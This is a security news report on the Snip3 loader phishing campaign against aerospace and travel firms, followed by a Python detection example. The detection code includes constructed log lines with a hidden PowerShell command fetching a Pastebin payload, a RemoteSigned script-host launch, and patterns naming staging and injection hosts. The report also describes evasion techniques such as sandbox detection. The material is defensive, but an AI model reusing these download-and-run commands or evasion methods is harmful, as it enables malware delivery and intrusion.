Microsoft has warned of a new phishing campaign aimed at aerospace and travel organizations that delivers multiple Remote Access Trojans (RATs), such as RevengeRAT and AsyncRAT, using an actively developed loader called Snip3.
In a series of tweets, Microsoft said that the attackers use the RATs to steal data, for follow-on activity and to download additional payloads. The threat actor also leverages the Agent Tesla malware for data exfiltration.
The attack starts with a phishing email designed to look like it came from a legitimate organization with lures relevant to aviation, travel, or cargo. The message contains an image posing as a PDF file with an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads.
The RATs connect to an attacker-controlled server and download additional stages from sites such as Pastebin. The malware injects itself into processes like RegAsm, InstallUtil, or RevSvcs and steals credentials, screenshots and webcam data, browser and clipboard data, and system and network information.
According to researchers at Morphisec, the Snip3 downloader, which was first spotted in the wild in February 2021, uses several advanced techniques to bypass detection:
- Executing PowerShell code with the ‘remotesigned’ parameter
- Validating the existence of Windows Sandbox and VMWare virtualization
- Using Pastebin and top4top for staging
- Compiling RunPE loaders on the endpoint in runtime
Snip3 is also able to detect whether the script is executed within Microsoft Sandbox, VMWare, VirtualBox, or Sandboxie environments, and if so, the script terminates without loading the RAT payload.
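The delivery chain above (VBScript dropper, PowerShell run with the RemoteSigned policy, staging from Pastebin/top4top, injection into RegAsm or InstallUtil) leaves a recognisable process-tree trail. The following added example, which is not code from Microsoft's or Morphisec's reports, shows simple detection heuristics run over constructed process-creation records; the key=value log format, the sample command lines and the `parse_event`/`classify`/`scan` helpers are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed process-creation records (the same fields appear in Sysmon
# Event ID 1 or EDR telemetry); none of these are real captured events.
SAMPLE_LOG = [
    'parent=explorer.exe image=powershell.exe cmdline="powershell.exe -Command Get-Process"',
    'parent=wscript.exe image=powershell.exe cmdline="powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Users\\Public\\stage.ps1"',
    'parent=powershell.exe image=powershell.exe cmdline="powershell.exe -w hidden -c iwr https://pastebin.com/raw/PLACEHOLDER"',
    'parent=powershell.exe image=RegAsm.exe cmdline="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"',
    'parent=services.exe image=svchost.exe cmdline="svchost.exe -k netsvcs"',
]

LINE_RE = re.compile(r'parent=(\S+) image=(\S+) cmdline="(.*)"')
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}                        # VBScript dropper stage
INJECTION_HOSTS = {"regasm.exe", "installutil.exe", "revsvcs.exe"}   # injection targets named in the report
STAGING_SITES = ("pastebin.com", "top4top")                          # staging sites named in the report
# PowerShell accepts any unambiguous prefix of -ExecutionPolicy (-ep, -ex, -exec ...).
REMOTESIGNED_RE = re.compile(r"-(?:ep|ex|exe|exec|executionpolicy)\s+remotesigned\b")

@dataclass
class ProcessEvent:
    parent: str
    image: str
    cmdline: str

def parse_event(line: str) -> Optional[ProcessEvent]:
    m = LINE_RE.match(line.strip())
    return ProcessEvent(*m.groups()) if m else None

def classify(ev: ProcessEvent) -> List[str]:
    """Return the Snip3-chain heuristics an event matches (empty list = nothing flagged)."""
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    findings = []
    if parent in SCRIPT_HOSTS and image == "powershell.exe" and REMOTESIGNED_RE.search(cmd):
        findings.append("script host launched PowerShell with RemoteSigned policy")
    if image == "powershell.exe" and any(site in cmd for site in STAGING_SITES):
        findings.append("PowerShell command line references a paste/staging site")
    if parent == "powershell.exe" and image in INJECTION_HOSTS:
        findings.append(f"PowerShell spawned {image} (RunPE injection target candidate)")
    return findings

def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (1-based line number, findings) for every record that trips a heuristic."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        ev = parse_event(line)
        if ev and (found := classify(ev)):
            hits.append((lineno, found))
    return hits
```

Each heuristic on its own is noisy in an environment that legitimately scripts PowerShell; correlating them on one host within a short window is what makes the chain stand out.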